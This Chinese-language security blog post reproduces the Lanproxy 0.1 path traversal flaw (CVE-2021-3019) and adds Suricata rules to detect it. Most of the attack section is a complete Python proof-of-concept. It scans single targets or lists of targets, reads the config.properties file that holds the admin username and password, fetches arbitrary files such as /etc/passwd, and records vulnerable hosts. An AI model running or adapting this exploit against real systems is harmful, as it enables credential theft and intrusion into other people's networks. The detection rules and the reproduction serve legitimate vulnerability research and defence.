Lanproxy 路径遍历漏洞 (CVE-2021-3019)复现以及suricata检测

0x01 Lanproxy简介

Lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具，支持tcp流量转发，可支持任何tcp上层协议（访问内网网站、本地支付接口调试、ssh访问、远程桌面等等）

0x02 漏洞简介

本次Lanproxy 路径遍历漏洞 (CVE-2021-3019)通过…/绕过读取任意文件。该漏洞允许目录遍历读取/…/conf/config.properties来获取到内部网连接的凭据。

0x03 影响版本
lanproxy 0.1

0x04 环境搭建

（1）Lanproxy下载

 https://file.nioee.com/d/2e81550ebdbd416c933f/files/?p=/proxy-server-0.1.zip

（2）启动服务
解压缩后进入bin目录执行 ./startup.sh启动服务

（3）访问8090端口，如图环境搭建成功

0x05 漏洞复现
上poc ../conf/config.properties

读取 /etc/passwd 文件
/../../../../../../../../../etc/passwd
0x06 POC脚本

import sys
import argparse
import os
from urllib import request
from urllib import parse
from urllib import error



headers = {
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/82.0.4080.0 Safari/537.36 Edg/82.0.453.0"}

def readConf(url):
    """
    默认读取配置文件，并通过能否读取配置文件来判断是否存在漏洞
    """
    config = [
        'config.server.bind',
        'config.server.port',
        'config.admin.username',
        'config.admin.password'
    ]
    path = "/../conf/config.properties"
    confUrl = url + path
    r = request.Request(confUrl, headers=headers)
    try:
        with request.urlopen(r, timeout=10) as resp:
            confContent = resp.read().decode('utf-8')
            for i in config:
                if i not in confContent:
                    print("[-] " + url + " is not vulnerable")
                    return 'Bye :('
            print("[+] " + url + " is vulnerable! :)")
            return confContent
    except ConnectionResetError:
        print("[-] " + url + " Connection reset by peer")
    except error.HTTPError as e:
        print("[-] " + url + e.code +e.reason)
    except error.URLError as e:
        print("[-] " + url + e.code +e.reason)
    except:
        print("[-] " + url + " is not vulnerable")
    return 0

def readOtherFile(url, path):
    """
    读取任意其他文件
    """
    jumpSym = "/../../../../../../../../.."
    fullUrl = url + jumpSym + path
    r = request.Request(fullUrl, headers=headers)
    with request.urlopen(r, timeout=10) as resp:
        fileContent = resp.read().decode('utf-8')
        print(fileContent)

def run(url, path="/../conf/config.properties"):
    if os.path.isfile(url) == False:
        if 'http' not in url:
            url = 'http://' + url
        if path == "/../conf/config.properties":
            print(readConf(url))
        else:
            if readConf(url) not in [0, 'Bye :(']:
                readOtherFile(url, path)
    else:
        urls = []
        with open(url) as target:
            urls = target.read().splitlines()
            for url in urls:
                if 'http' not in url:
                    url = 'http://' + url
                if readConf(url) not in [0, 'Bye :(']:
                    with open("success.txt", "a+") as f:
                        f.write(url + "\n")
            f.close()
                    
            
if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="CVE-2021-3019 lanproxy arbitrary file read vulnerability detection POC")
    parser.add_argument('-u', '--url', type=str, 
        help="test a single website")
    parser.add_argument('-r', '--read', type=str,
        help="this parameter is followed by the file name to be read, the configuration file is read by default")
    parser.add_argument('-f', '--file', type=str, 
        help="perform vulnerability checks on multiple websites in a file, and the vulnerable websites will be output to the success.txt file")
    args = parser.parse_args()

    print("""
 ######  ##     ## ########      #######    #####    #######     ##        #######    #####      ##    #######  
##    ## ##     ## ##           ##     ##  ##   ##  ##     ##  ####       ##     ##  ##   ##   ####   ##     ## 
##       ##     ## ##                  ## ##     ##        ##    ##              ## ##     ##    ##   ##     ## 
##       ##     ## ######  ##### #######  ##     ##  #######     ##  ##### #######  ##     ##    ##    ######## 
##        ##   ##  ##           ##        ##     ## ##           ##              ## ##     ##    ##          ## 
##    ##   ## ##   ##           ##         ##   ##  ##           ##       ##     ##  ##   ##     ##   ##     ## 
 ######     ###    ########     #########   #####   #########  ######      #######    #####    ######  #######  
                                                                                            Author: _0xf4n9x_
    """)

    if len(sys.argv) <= 1:
        parser.print_help()
    elif sys.argv[1] in ['-u', '--url']:
        if len(sys.argv) == 3:
            run(args.url)
        elif len(sys.argv) == 5:
            run(args.url, args.read)
    elif sys.argv[1] in ['-f', '--file']:
        run(args.file)

0x07 suricata检测
（1）检测rule

alert http any any -> any any (msg:"检测到[CVE-2021-3019]Lanproxy 目录遍历攻击"; flow:to_server,established; content:"|2f 2e 2e 2f|";content:"conf|2f|config.properties"; http_uri; distance:0; content:"server.bind="; http_server_body; reference:cve,2021-3019; classtype:web-application-attack; sid:2101120301; rev:1;)

alert http any any -> any any (msg:"检测到[CVE-2021-3019]Lanproxy 文件读取"; flow:to_server,established; content:"|2f 2e 2e 2f|"; content:"etc|2f|passwd";http_uri;content:"|2f|root"; http_server_body; content:"|2f|bin|2f|bash"; http_server_body; reference:cve,2021-3019; classtype:web-application-attack; sid:2101120302; rev:1;)

(2) 检测结果

0x08 参考链接
https://www.jianshu.com/p/6482ac354d34
https://github.com/FanqXu/CVE-2021-3019